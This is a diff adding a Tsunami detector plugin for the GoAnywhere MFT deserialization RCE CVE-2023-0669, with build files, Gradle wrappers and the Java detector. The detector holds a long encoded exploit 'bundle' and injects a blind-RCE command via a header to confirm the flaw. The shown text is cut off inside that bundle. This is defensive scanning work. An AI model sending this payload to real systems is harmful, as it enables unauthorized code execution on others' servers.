diff --git a/community/detectors/goanywhere_cve_2023_0669/README.md b/community/detectors/goanywhere_cve_2023_0669/README.md new file mode 100644 index 000000000..59ce86646 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/README.md @@ -0,0 +1,32 @@ +# CVE-2023-0669 GoAnywhere MFT RCE vulnerability Detector + +## CVE + +[CVE-2023-0669](https://nvd.nist.gov/vuln/detail/CVE-2023-0669) + +## Description of Vulnerability + +This detector checks for GoAnywhere MFT RCE vulnerability CVE-2023-0669. + +GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to +deserializing an arbitrary attacker-controlled object. + +All versions prior to 7.1.1 are affected,Update GoAnywhere MFT to a version that provides a fix 7.1.2 or later + +## Related Articles + +https://nvd.nist.gov/vuln/detail/CVE-2023-0669 + +https://www.vicarius.io/vsociety/posts/unauthenticated-rce-in-goanywhere + +https://www.cve.org/CVERecord?id=CVE-2023-0669 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/goanywhere_cve_2023_0669/build.gradle b/community/detectors/goanywhere_cve_2023_0669/build.gradle new file mode 100644 index 000000000..77bd8e54a --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/build.gradle @@ -0,0 +1,72 @@ +plugins { + id 'java-library' +} + +description = 'CVE-2023-0669 GoAnywhere MFT RCE vulnerability Detector' +group 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenLocal() + mavenCentral() +} + +java { + + + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + + + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/en/java/javase/11/' + source = '11' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + okhttpVersion = '3.12.0' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} diff --git a/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.jar b/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..2c3521197 Binary files /dev/null and b/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.properties b/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/goanywhere_cve_2023_0669/gradlew b/community/detectors/goanywhere_cve_2023_0669/gradlew new file mode 100644 index 000000000..f5feea6d6 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/gradlew @@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/goanywhere_cve_2023_0669/gradlew.bat b/community/detectors/goanywhere_cve_2023_0669/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/gradlew.bat @@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/goanywhere_cve_2023_0669/settings.gradle b/community/detectors/goanywhere_cve_2023_0669/settings.gradle new file mode 100644 index 000000000..9d2694249 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/settings.gradle @@ -0,0 +1,2 @@ +rootProject.name = 'goanywhere_cve_2023_0669' + diff --git a/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorBootstrapModule.java b/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorBootstrapModule.java new file mode 100644 index 000000000..e88b2ac08 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorBootstrapModule.java @@ -0,0 +1,11 @@ +package com.google.tsunami.plugins.detectors.goanywhere; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +public class Cve20230669DetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(Cve20230669VulnDetector.class); + } +} diff --git a/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669VulnDetector.java b/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669VulnDetector.java new file mode 100644 index 000000000..232064283 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669VulnDetector.java @@ -0,0 +1,141 @@ +package com.google.tsunami.plugins.detectors.goanywhere; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.*; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects the CVE-2022-0540 vulnerability. Reading */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + author = "SuperX (SuperX.SIR@proton.me)", + name = "Cve20230669VulnDetector", + version = "0.1", + description = + "GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License " + + "Response Servlet due to deserializing an arbitrary attacker-controlled object." + + "version 7.1.1 and its earlier versions", + bootstrapModule = Cve20230669DetectorBootstrapModule.class) +public class Cve20230669VulnDetector implements VulnDetector { + + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final String LICENSE_URL = "goanywhere/lic/accept"; + private static final String COMMAND_HEADER = "x-protect"; + private final HttpClient httpClient; + private final Clock utcClock; + private final PayloadGenerator payloadGenerator; + + @Inject + Cve20230669VulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); + this.utcClock = checkNotNull(utcClock); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("CVE-2023-0669 starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build(); + + if (!payloadGenerator.isCallbackServerEnabled()) { + logger.atInfo().log("Callback server disabled but required for this detector."); + return false; + } + + Payload payload = this.payloadGenerator.generate(config); + String commandToInject = String.format("%s", payload.getPayload()); + String licenseUrl = + NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + LICENSE_URL; + + String deserialized = + "bundle=Jh88_jqGQWSbZmiCc1DErQhwOhCTLkYmA1yXgf86Ha5HF9IfVuQMLOfBS_fjlP7wTTEg2" + + "-Jx9nBDyFUKVTroXpFBt7zN1XDX58VKZCxCXlUD45d4laUUnNuzdyvNLT2b_gYKBi2" + + "-ny7fc2lOHNgalYV13mQzCTs0EgEUE9AuDUIMcFYx00pv4g4EOgEjeWbAx40rTtRby71AxapyXKy" + + "-4XChDHVlPB1AV3njBKGWT6gHdPxT8hb75Ycrpjdk9EQ1HW4WJiz4uaVBu7hXm_Eag15IpIWgojFy4hst8" + + "-q9YMms8Omq5lbdLabUHRcJAd6rLu6QrPLepYXQgGfMi_Qmj0qf5vXLfSX20cSBT_IEBlzzBR3lq_hiqrAfmZZCV3Y1HeMPpaMsmzL5zM1VTMX-5Pi5JGKMJ2Al2BZVZUUZQNqrcnueMVl1ZNhGMJ8eSFBCb4WGaNrhfgQ3sWUW3_A_ln_XwLi8z6XCOT5sJmFYZXBC4vYtY4leatX_o__lJHYPuA_TEmuEmEhIccj5Ou2xOvazmw9oXVUbM0vkPsb1UDyyTF0Ee85W0CUUCzb3rouvUDFaOZZLe08Z_Km2LgSq9Wr3fKojx_UevkOkOfwfiPlnJcQTRr45useRtOlHrJpP1iWSLi2vwK8bojMdCWzF13H8MmDjrJBCbcbChsXQkNcAJqkYa3y2SZXkwISRigFVLRnjDbyQLqLAzE0inCSf7NF9abKU5ZW8yMgF6NT802MJCz0gRJD6zLbFZSBYfGlzFJmu9-ZWYVywkwmu3xQrrA_tCRdqvd5zeHd3CgWOzBjOg55_iBNcPZOPYhMXD1ZEpPyG0CQpJfIUiblo4gGV0op-Mb2z5HIuvJ-l_YCxoYJi5RCdtgGoSmIo9wN59S0PeI6LI69EsoquDh7EA9Z7pc6XGk6rrbsJoFcV-lp_73dwmOH1U6pZRcEeMYgrB3n_R0BsoYHTika_iGEmmYv1CgBDfMlmVdQbtefAwh_AcJ9pyNACTwWdXQ0xmto3YYLbizDnmZ--NeiQ_534fTrGfjcIsbLgEnHcpG7Fwng72m7pHVy5LpurnRJXJyFBJW9IUF0vwH_UDZtAfeBK4kMbkuJrCTtQdyCks5SjfQWTArKeNGiKbGWReNhOnUnK8A2sxiYtvqlUi01mfOIfoc-9Lp6wXEBrNzWHH0zPWu4SNQmhR-JwmvFeIErraf83vz0_sRoU7IcSqKEF5zFjFF8n1oWqwBP5a3s_fKgbQ_UA74vmFh5cc_tlpBXS1oG8_EU5GAFI-woAA0Mlgkwmo-fGH1w1wB1LSOzgiT7r4QKDko55Timnwpk_D4RmXesvtu49-xyXcg4sL6NG5ujC6o5kKbTrwi7Vp8hjEx1v6nXeMfUbuWjYicH-ZIE_P_SMevvDUOQm3UZ67MbmdkReIR32TN_88A4J5dKN0QC08HLkYNSjsRp7XyXbSi5dZp3eQ6zkW9KuYU-S-NSBC9pV4arvsZXcwtWRTjweK49JIIgLMayI4y9TOjhg-LiwwzIlTY_t0KuzHSIYSw82LxmOeDhdQUC-sSOeV1G2sR095x3NDmfEfdvduTceU9cD3ofEFtedX5Z77aGFoVhdoG_hOjnYnaoaWYPe7JChYE0TZZfu3V7HF57X0cwoYYPDP6XzSf6kmxEWDoenYsPTmY_Evhqwp3Fhzko8_G-UR2tNH9JjIoouCEd8o8Gy7gnye2_u6wzCBuChv1yEug0miW8nSCQk69oHWeti94h1toBecBt70m8ySDHgL80vs4n5qHK2Mjv_eb3a5UrajOObvfoNMg_K85EudKBrdgW6bEV5KsZhFBDpDnxA7X8CHEHZiK4iDCFUCmSMCXQz7KqkHrcWh8l1ut7IPoxuiRhdI5wuNSw-xVmVwM1kJo5ahlOZcsARCNZ9NcAjcqojMDZjgkPo7lt-5Lrl2gPHg80YkNsfdB8Ao91vcZ6UuJ45ERB1G8V7TwxCMsHU8h8FFet1zb55rcBE-YJ5rvzaXif3OOFiS4MnA0LDszZkFJ4gW2SIMban79bz38yBnEz-au5l2SwkG7tY3DiKobiIz6ZJjOzVj2jAT7MsCpB8XNl8tCMYJHWErFrExXbosh-YvXoU8HCN_XALqBSZJyffqKu0iAYcyxc35QQl55ll-IybJU3Gu4LPGT6HXPlK3Hepmdd1ZhLzQG-adp465TzIDX-0YUK_Px-J0gmoW-kgUiGAVKrHIS4Qh-1E80u7GI_WUZTXSE7sgKUX-2qEUj6reo7Kf_4c_CZrwkA4RtoQrQMCs4Bs7dAft1eAqb9O-SDcW8kShwpUow3nz6PFKkdZ4SjYTNUjANTJT_7Yvzu-nHDPpEyriuZ4zcGKTadRgL2bbv1MwcTzJ1iCGMGXNk-sMiqOpqGdW_tAbfrGAuAjSiK5vCK4tO2xjR9qlMu9mzvC6FWXMlgoDFWbrXDSLUWWpgthJssAzniuX1iuGBlWmC7MzOCLQYyHKTIGDysqW4BgHQabqeXtqPoCLUCcCY8tlaACSFFe9ZQcQXgTHwClL5_TI2-9Cn5wIz28o-krld22hZ5KUWvXcW_278n6TxUJZPArM-KweuxdkzFYHjg1i8eZygMFz17MA9rUSTJzG7qvyXR_OIvI9EcGVP91noBQ2pN9zqFq7o81DRUmrNbNL1I4GPwK4kkLJVOJ1o6Hgw-zXmjeMveQII-aRzh-O2zZ9dpBJ8Yne7nWgeq1XAxW3A0lkqKr5hRbJD8najEI1xWvUEBHbPLD3oy4FGrs2Pegj7JlsGIwcmsQ8S_3bcp9ycdpNWXR0qgku3ltIZdFfW3Tnm-NFbfvkIRqmk8CaYsX2NlXGCJBLSt5HHioXDyUn1dRKvTpLx8aw41HqqGAACACvSWo0VLi4uXvxUZTgeA7q6BzH7KxptrTX62rBrU6R2ul5cgjTEYnakqcNUyJDjbxHBw1wY3k75erwfFj_pc6pE0PlB9zqIROk0yOiy2OWpg4KCAjryY1U0eOjnZVsoWjEuBT7Uvu0_9h04yZqToxRfu0WIODBLGJZ0lpx2bXtcaZPRFNwOFAeGHNpSY-ZO48bQR2Eo8kbB62w5DU6pKlFzCzK-bOzVvYUYDkYoQUSclOkW96M0hQ5DvJggB14AuXv0n4jsC1j_z4Yg1oeVnSbDA1PuGcAq8TovQX1KzpSHORoQFEhcclGxhc5-6kPt_cqImHd2C2UpYhVGEff3d2ShRzOETbELCR9w5OLY5EB4AxIOB9K4UUB-iqusjEmTYogjUUPhrHz1Dl88DD-W_QIR1fSpKDlCKWZXLWueZKXEFTKTIrWltCqbANJMPx5ww4Yo7jau6jZOPZWaZg_rApAJ4GhISBNRNUaRMUwRuKHrIaXBamJfkZXZNBJaUyv5uFXkCqkKlotr3JpOe8kBeFq_h-mmgM5G2pCK1LvnpIzXqMe1vPuR7om0ar4hRpV8aBlmhG9M7N2NQS50c-d96qKQQNDT_RgKslJfEPl4LuBie9IFlZ9qbpyq25XadMoDvDjuddAGb2jouTI8t1wXoK_fGMzUlPa7_Fq1yJqaeLF4gvoqZcEdocc0BZuM_8YqQGPhPRtxJ2wfnJ-9rdz58RNX8KoUnPEo7Y_GU5MqcmIsIqWgLkLHbFTytO9Xf2v90LKZoJy6vxfuD0C3ocGZ4syFrus4zZ0ydMU8L0b5A4Z9c4U7LE4kn79ujOBeseZDE1nAr2RL1c9ReAjJ6CLqpPYTihhLHglog64HMcxTGj1_fEnrNB53mzD0cw1UB5_kRE-Yr_JY0PRvYYGVfKfaXeklUVn3Rb-npVABFVQ6XrCN1dUFOhy4rUe3mZ3kyAXvjpXiRrkRnbKAk1c2ynLrIDetbNoQQGdIouuBEDX9NJIE9zKAttSQBpC5Xkoeu68oQcTU3IW_N848fuGIUsUl4oqO1wjNuG4TTBCCA82gu269_LCg5jB9JEa-DlhPzRwoGhJ4muc1ThgsINoLcevNu5iwP-ebUQfolW6ZdR3i12Eh9bZi3yiE7Sieb-dXx_qm5IrdlY0SZWKNC8OqlxVUzLaseMBE3kPrT-Dz6ClJXewCEU1vGYzPvKggCgg5clwEwsjGsOq7XYLGRJ9f5pMKZkcfO6-v4FpCk3fjHh0NDDZ8EE3i74a5fh1wVKsR2EJPpl6bEpWhMUDPtcavuTP7xbJC1sFDuLzoSE6qVXLbZFWPS6VMCEzkJ1-FxVsVE_WE4v72iygfLGZaOFgzyVOSEZAm8GThgHsxrKTb2_v5JcWLuock1Z6uva8P13htuNHACPZ3yhkXbuJ2b-6ucy2ZLurigtEDsNsmXsybmWdpS4vA6gnPDr5iSxVXz4BLyW0ShEbKLls_eJ_pH-y1b9Hw0KVVbcE05-bckumz7H-LwhcGVBsi2SKpoGSugH6gbX_fqrraMB0aC-0v6JIZ8WUNa7ElaMfJsE6XstjaE7KjXFHuhyQKeHgWKjm1oV8yLW7vRuqhs5RfWV3E09y2yASv_DY1WxMotFAqOHhz-zt3CiZCXQkPsjly3uHDKLrIjMYrHFvPPmQ8jD6AWiupBSVUi9yFnSFeZq8Ws3-Ki8JQEuWtMhCOsF5nBIb9NUifxO6sK2hUlbBVnhGV1PAz1FZ0tMHhFg7AVeviqUlePVASRtUQ-HmW9qPqH1UXiwysQAprepW6tHuExtYchRcla7ApOqUcQl1oCdQl6tsvn3ewlMTHvAyhUMjeap3yHlzUro-kFf-D285ircmCHRvoXgySqqZjO_8hkEcgBEWSp5Yn8xNZmw9PEthJzvAL2F6UfY58G_WrSIj5B-6GgHdgDVSzLiYSh_lrMFEd4QBtVYLz9KWlY5jjXxmN50RjWGhf2qx0iGrFC2ZnAwN6RxrB07Gl-nI2rAYVWoa_oIz_3s2rI7ll6fvzmdwKrSPNdcnG3MYVvTo8gAHrvhgFUje71_EgabRgOQv6XFCX6Vhsh9crycXjtISPU8ZWnf9tSQh-nUBplB2Go2WSmmLk1Rhu0deMsChn6dI7OQ-ed-36C_on1CY5bSuEkpJxxsNrcZTdmRG3KPlwHVcZ1kfFKlSTnFPjoOq1VLgLGuaOJFFiTerU2tbfj8rbgZbYOeZZToik7OirRjX_oTyKwHGQq5Y0d_W1Whwr8i5xK-V4HsdDOAOPv7NzL8-yxnL73kWP2357B_8yvUxHKjZ_ynyr--_ueBVZbOwnt4oBpbtsLh7_A6vo0MdBs2HpRRq8USpxlgN_s_2DNFRrxejgphOPDeHT-_mh7ey3lSZNMt3NU2M7lPWzWsffu5R5PXY9BxJT0PsUAgJS3i-sB5D4Fg7e4WiF83UroEYaz9mM0B-7VQ7hkqBgPEiDH2rZpUyhsG51TlYSbzb46g41vXdFpygqntOlEgBYkVbLwN3fIM9s2RL4908QD8o-ePuO-CnFL5KU5Yh7IcBx8a2FovJf07J7IoShuB2grZ7Uq8hwa5OJjZ0yN1pz1KsdT_OKONiiDiWvf67QRkrogsxA2PbFC4Qhr1ZwOnEO8fhZTFx_fdt5_z7RkjfObiDBNq